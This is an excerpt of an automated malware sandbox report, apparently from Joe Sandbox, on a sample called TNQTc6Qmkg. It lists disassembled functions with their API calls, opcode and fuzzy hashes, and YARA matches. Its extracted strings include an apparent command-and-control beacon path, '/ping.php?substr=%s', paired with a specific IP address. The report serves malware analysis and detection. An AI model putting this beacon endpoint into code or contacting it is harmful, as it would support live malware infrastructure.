                                                                                                                                                        • Instruction Fuzzy Hash: F0A15632E05786AFDB25CF68C880BBEBBE5FF11350F14416BD9959B2C1C6388941D761
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1036877536-0
                                                                                                                                                        • Opcode ID: c52314c68bb5d2cd0ec3ccb49d1868c21592631552be694c337c0e3ca6bae7eb
                                                                                                                                                        • Instruction ID: fd8853d8f1522a73f401650a4168fe8705857821074eec12fc08c2aeadde5945
                                                                                                                                                        • Opcode Fuzzy Hash: c52314c68bb5d2cd0ec3ccb49d1868c21592631552be694c337c0e3ca6bae7eb
                                                                                                                                                        • Instruction Fuzzy Hash: 9EA11272A083869FDB218E18C881BEBBBF1EF55354F1441AEE5859B281D63C8982C758
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                        • Opcode ID: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
                                                                                                                                                        • Instruction ID: 64955bac524ba1b7a5d1c9540d85ddefda7dd8527dc728540027a84c5a93bf0d
                                                                                                                                                        • Opcode Fuzzy Hash: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
                                                                                                                                                        • Instruction Fuzzy Hash: 44412B39B002157BDB25AFBAAE8CB7E36A6FF05331F140217FD18D62D4DA3685408279
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                        • Opcode ID: 438df31e4ca0038dfaee660d81f95d1ac1cde2fe31961a88ef6aff440cd1ee1d
                                                                                                                                                        • Instruction ID: 928e3cb369f2e27a6f9c5d6c25e794823a6f45c2d4bbec1796fd6aa098e8f7c9
                                                                                                                                                        • Opcode Fuzzy Hash: 438df31e4ca0038dfaee660d81f95d1ac1cde2fe31961a88ef6aff440cd1ee1d
                                                                                                                                                        • Instruction Fuzzy Hash: B2411B71B002247BDB206B7A9D41BAE36A4EF05334F54021BF818D6291D6FC8DC19669
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042E790,00000000,00000000,8B56FF8B,05D04002,?,00000004,00000001,0042E790,0000007F,?,8B56FF8B,00000001), ref: 05D0B5B4
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 05D0B63D
                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 05D0B64F
                                                                                                                                                        • __freea.LIBCMT ref: 05D0B658
                                                                                                                                                          • Part of subcall function 05D07CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05D07CDE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2652629310-0
                                                                                                                                                        • Opcode ID: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
                                                                                                                                                        • Instruction ID: d23d0bbdb0512a1134f358d965eef10d5423b09747b113550607dc553a334920
                                                                                                                                                        • Opcode Fuzzy Hash: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
                                                                                                                                                        • Instruction Fuzzy Hash: 3831C371A0420AABEF24DF65CC44EBE7BA5EF40210F44056AED45DB190D735CD60CBA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 05CFCF2B
                                                                                                                                                          • Part of subcall function 05CFCE78: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 05CFCEA7
                                                                                                                                                          • Part of subcall function 05CFCE78: ___AdjustPointer.LIBCMT ref: 05CFCEC2
                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 05CFCF40
                                                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 05CFCF51
                                                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 05CFCF79
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 737400349-0
                                                                                                                                                        • Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                        • Instruction ID: 7419660f78c754798615d73ee3c44ed564ad3fc2a2c953cff1e10f3d8846088d
                                                                                                                                                        • Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                        • Instruction Fuzzy Hash: 1F014C32204109BBCF526E95DC44EEB7F6AFF99754F044804FF18A6120D732E961EBA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0040CCC4
                                                                                                                                                          • Part of subcall function 0040CC11: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC40
                                                                                                                                                          • Part of subcall function 0040CC11: ___AdjustPointer.LIBCMT ref: 0040CC5B
                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0040CCD9
                                                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCEA
                                                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 0040CD12
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 737400349-0
                                                                                                                                                        • Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                        • Instruction ID: f1d65ff4a2caa8f4402a5ee0af87b259506669f2abbd9cc63769bcbaa0b6a130
                                                                                                                                                        • Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                        • Instruction Fuzzy Hash: 1D012D32500108BBDF116F96CC81DEF7F69EF99758F044129FE0866261D73AE861EBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,05CFED94,00000000,00000000,?,05D07461,05CFED94,00000000,00000000,00000000,?,05D07719,00000006,0042F348), ref: 05D074EC
                                                                                                                                                        • GetLastError.KERNEL32(?,05D07461,05CFED94,00000000,00000000,00000000,?,05D07719,00000006,0042F348,0042F340,0042F348,00000000,00000364,?,05D07052), ref: 05D074F8
                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,05D07461,05CFED94,00000000,00000000,00000000,?,05D07719,00000006,0042F348,0042F340,0042F348,00000000), ref: 05D07506
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                        • Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                        • Instruction ID: 64462f59fb088865b4ebc59340a5dca15a95b469090691d184899887481cdc81
                                                                                                                                                        • Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                        • Instruction Fuzzy Hash: E501F7367552279BC7318F68AC4CFA67B99FF057A1B501931FA0ADB1C0DB20E902C6E4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 004129CD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                                        • String ID: pow
                                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                                        • Opcode ID: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
                                                                                                                                                        • Instruction ID: 0a9ba9cf01538bb623dd895b254acf0ed02b79a8d0ee48bda8380b1111d13792
                                                                                                                                                        • Opcode Fuzzy Hash: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
                                                                                                                                                        • Instruction Fuzzy Hash: 3651607175420196C7217718DF813FB6BA0EB40750F64497BE085C23A9EB7D8CE6DA8E
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DE21
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Info
                                                                                                                                                        • String ID: $.A
                                                                                                                                                        • API String ID: 1807457897-2696116503
                                                                                                                                                        • Opcode ID: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
                                                                                                                                                        • Instruction ID: bc213980aac5c6bda6009a83c5849e62ad2cee4ae6a6ae2e32fe98ed2f123d1c
                                                                                                                                                        • Opcode Fuzzy Hash: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
                                                                                                                                                        • Instruction Fuzzy Hash: EA410AF190434C9EDB218E248D84BFABBB9DF55304F1404EEE58A97142D23DAA86CF65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 05CFA96A
                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 05CFAA23
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                        • String ID: csm
                                                                                                                                                        • API String ID: 3480331319-1018135373
                                                                                                                                                        • Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                        • Instruction ID: c9880cb2eda6ed0d4e38f89b60cca4e70404f6a323523e0843a8d6e236b53bb5
                                                                                                                                                        • Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                        • Instruction Fuzzy Hash: C4410634B00209ABCF50DF29CC84AAEFBB1BF49314F148565EA1A5B391C7719A59CF90
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002), ref: 05D100D4
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                        • API String ID: 0-711371036
                                                                                                                                                        • Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                        • Instruction ID: f34b58d40f226107fe07072fccac136458ecf99ec0af545d4147d047536e4520
                                                                                                                                                        • Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                        • Instruction Fuzzy Hash: B0219262B04104B7E734AA74E909FA7726BFB84B50F468466ED4AD7144F736D9C083AC
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002), ref: 0041FE6D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                        • API String ID: 0-711371036
                                                                                                                                                        • Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                        • Instruction ID: db8a1e39b5ed56134af0dcb237998205fad8b660637b78a6cadd581e1e0cf4fb
                                                                                                                                                        • Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                        • Instruction Fuzzy Hash: 20213872A04301A6DB308E15D9017E7739A9B60B24F164077E90AC7312E73ADDC7C39C
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 05D162B6
                                                                                                                                                          • Part of subcall function 05CF1E19: __EH_prolog.LIBCMT ref: 05CF1E1E
                                                                                                                                                          • Part of subcall function 05CF266A: __EH_prolog.LIBCMT ref: 05CF266F
                                                                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05D16398
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                        • String ID: ,jC
                                                                                                                                                        • API String ID: 420165198-3201430929
                                                                                                                                                        • Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                        • Instruction ID: e52603536a9bf8c432b3ab26f7797c9eeff6e79b10f95d71dd6eb2c912f79b6e
                                                                                                                                                        • Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
                                                                                                                                                        • Instruction Fuzzy Hash: 9131EBB5E01119EBDB14DF94D994AEDFBB4FF48304F10856AD405A3640DB74AA08DF64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00417217
                                                                                                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                        • String ID: -@
                                                                                                                                                        • API String ID: 2279764990-2564449678
                                                                                                                                                        • Opcode ID: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
                                                                                                                                                        • Instruction ID: 290a678ed3add9fd0faa91afd9d0ee705692a8110a20fb2286b59343c35ba588
                                                                                                                                                        • Opcode Fuzzy Hash: d5f4a00e4ea312b7d3a414fb44f76d48f23aa1c3aa7f8720876b6b1e831c6d21
                                                                                                                                                        • Instruction Fuzzy Hash: 2B110A33A041209BAF369E19DC809DB73B5EB847247164172FD19AB354DA34DC86C6D9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: /ping.php?substr=%s$185.172.128.228
                                                                                                                                                        • API String ID: 3519838083-3577573015
                                                                                                                                                        • Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                        • Instruction ID: 3ceb84532f9cd66de14f414fb6123d513370d44f600d85507b073077fac01a71
                                                                                                                                                        • Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                        • Instruction Fuzzy Hash: B501C072A05155BBDB04DF98EC44BAEBBB9FF44614F14092AF905D3240D7749A40C7E4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: /ping.php?substr=%s$185.172.128.228
                                                                                                                                                        • API String ID: 3519838083-3577573015
                                                                                                                                                        • Opcode ID: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                        • Instruction ID: 7b6dfb3f8f1c8d27c76164ee4eac5e21074d72dd8ad347809e0f3e64fbe8a7e5
                                                                                                                                                        • Opcode Fuzzy Hash: f1305d7e47ccb51794fd0344b69111e12c8a62ce6eac32493127aafbfd273c69
                                                                                                                                                        • Instruction Fuzzy Hash: 0F01C472A01114BBDB04AF899C41BAEF769EF45315F10013FF405E3292D3789E41C6E9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                        • std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                          • Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
                                                                                                                                                          • Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
                                                                                                                                                          • Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
                                                                                                                                                          • Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
                                                                                                                                                          • Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                        • String ID: T*@
                                                                                                                                                        • API String ID: 4198646248-2370032326
                                                                                                                                                        • Opcode ID: f7290a10d1b4237e93a88f2e9094d642a1896cb01957c23fb39c05d414f97c01
                                                                                                                                                        • Instruction ID: f5781f1056de0421007c94b05f43b79da385089699a731dc7870890d3004fbc1
                                                                                                                                                        • Opcode Fuzzy Hash: f7290a10d1b4237e93a88f2e9094d642a1896cb01957c23fb39c05d414f97c01
                                                                                                                                                        • Instruction Fuzzy Hash: 8B21B0B5A00A06AFC305DF6AD580995FBF4FF49314B41826FE809D7B50E774A924CFA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00404373
                                                                                                                                                          • Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47
                                                                                                                                                        • __Getcoll.LIBCPMT ref: 004043CF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$Getcoll
                                                                                                                                                        • String ID: u@@
                                                                                                                                                        • API String ID: 206117190-736001340
                                                                                                                                                        • Opcode ID: 98940f472b430986a063070397352c0148bb09207a456bdfd0cd06b8d288d3e7
                                                                                                                                                        • Instruction ID: 69c11f36173d25db8645085f4dff982521935f2d07d38959ddb20a2960a7de4d
                                                                                                                                                        • Opcode Fuzzy Hash: 98940f472b430986a063070397352c0148bb09207a456bdfd0cd06b8d288d3e7
                                                                                                                                                        • Instruction Fuzzy Hash: B21170B19012099FCB04EFA9D581A9EB7B4FF44304F10843FE555BB281DB789A44CB99
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 05D0A9D1
                                                                                                                                                        • GetLastError.KERNEL32 ref: 05D0A9DF
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 05D0AA3A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                                        • Opcode ID: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
                                                                                                                                                        • Instruction ID: 026c058eab705068bc241ee8c42c69aa1c6671899ec0477dc828133be557ef3d
                                                                                                                                                        • Opcode Fuzzy Hash: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
                                                                                                                                                        • Instruction Fuzzy Hash: 0141B331704326AFCF21CF64DD48BBE7BA5EF41320F15916AE95AAB1E0D7708901C761
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A76A
                                                                                                                                                        • GetLastError.KERNEL32 ref: 0041A778
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A7D3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                                        • Opcode ID: be72b92f97b89cfc26330611fce1d14ea8f59d6c2fceb8f783a7245ea47926fa
                                                                                                                                                        • Instruction ID: a04565de271e9a0d08a9f39f26722ecfcdc9a59ce40c97fd2178d4ba0242ee74
                                                                                                                                                        • Opcode Fuzzy Hash: be72b92f97b89cfc26330611fce1d14ea8f59d6c2fceb8f783a7245ea47926fa
                                                                                                                                                        • Instruction Fuzzy Hash: 5541E934602246AFCF219F69C9447FB7BB4EF01310F14416AEC6997291D738CDA2C75A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:4.2%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                        Signature Coverage:2.4%
                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                        Total number of Limit Nodes:41
